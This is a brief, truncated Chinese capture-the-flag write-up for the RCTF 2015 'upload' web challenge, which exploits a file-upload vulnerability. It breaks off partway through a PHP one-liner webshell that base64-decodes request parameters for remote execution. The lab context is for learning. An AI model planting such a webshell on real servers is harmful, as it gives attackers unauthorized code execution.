XCTF - web - wp1 (不按期整理)

upload ( RCTF - 2015 ) 一進入靶場有個登錄註冊(看上去像是二次注入,算遼先忍住騷操做,老老實實循序漸進) 因而獲得下面的上傳文件界面: 結合題目upload,天然按照文件上傳漏洞往下作 這裏用我最經常使用的php一句話進行掛小馬嘗試:php <?= $fun = base64_decode($_REQUEST['fun']); $arr = array($_POST['she
相關文章
相關標籤/搜索